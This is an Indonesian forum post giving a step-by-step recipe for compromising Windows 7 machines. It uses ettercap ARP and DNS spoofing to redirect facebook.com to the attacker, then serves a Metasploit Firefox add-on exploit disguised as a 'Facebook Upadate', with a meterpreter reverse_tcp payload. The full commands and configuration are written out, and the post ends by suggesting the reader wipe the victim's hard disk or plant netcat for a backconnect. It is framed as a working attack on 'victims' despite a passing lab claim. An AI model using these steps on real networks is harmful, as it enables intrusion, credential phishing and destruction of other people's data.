11-16-2012, 02:15 PM
Untuk memasuki system windows 7 ada banyak cara salah satunya memanipulasi add on dari mozilla ketika menjalankan exploit ini browser korban akan muncul dialog penginstalan add on mozilla ketika korban klik install dan menjalankan payload dan anda mendapatkan akses penuh pada komputer korban
Telah saya coba pad lab saya
berikut POC nya
Atur dulu dns spoof nya
buka console lalu ketikkan perintah
root@dvildance:~#locate etter.dns
untuk mengetahui letak pengaturan ettercap
kemudian atur dns spoofnya di pengaturan etter.dns
root@dvildance:~#nano /usr/local/share/ettercap/etter.dns
rubah ipnya menjadi ip kamu disini ip komputer saya 192.168.1.7
rubah di bagian ini
Code:
# microsoft sucks ;)
# redirect it to www.linux.org
#
facebook.com A 192.168.1.7
*.facebook.com A 192.168.1.7
www.facebook.com PTR 192.168.1.7 # Wildcards in PTR are not allowed
Kita akan spoofing facebook apabila ada korban yang membuka facebook akan di arahkan ke ip kita
setelah itu save dengan menkan cxtr+x lalu y dan enter
Ketika sudah di set buka msfconsole pada terminal backtrack
root@dvildance:~#msfconsole
Tunggu hingga metasploit muncul dan ketikkan perintah exploitnya
msf > use exploit/multi/browser/firefox_xpi_bootstrapped_addon
msf exploit(firefox_xpi_bootstrapped_addon) > set payload windows/meterpreter/reverse_tcp
msf exploit(firefox_xpi_bootstrapped_addon) > set addonname Facebook Upadate
msf exploit(firefox_xpi_bootstrapped_addon) > set srvhost 192.168.1.7
msf exploit(firefox_xpi_bootstrapped_addon) > set srvport 80
msf exploit(firefox_xpi_bootstrapped_addon) > set uripath /
msf exploit(firefox_xpi_bootstrapped_addon) > set lhost 192.168.1.7
msf exploit(firefox_xpi_bootstrapped_addon) > set lport 443
msf exploit(firefox_xpi_bootstrapped_addon) > exploit
Sekarang tinggal memulai spoofing dengan ettercap
buka terminal dan jalankan ettercap dengan perintah
root@dvildance:~#ettercap -T -q -M arp -i wlan0 -P dns_spoof // -P autoadd
tunggu hingga korban menginstall add on
Dan berhasil dapatkan meterpreter tekan ctrl+c untuk mengakhiri dan masuk ke meterpreter dengan perintah sessions -i 1
info pc
Sekarang pc korban berada di tangan anda
bisa format hardisk korban bila lagi sumpek mode ON/OFF . . .
atau pasang netcat untuk backconnect
:-bd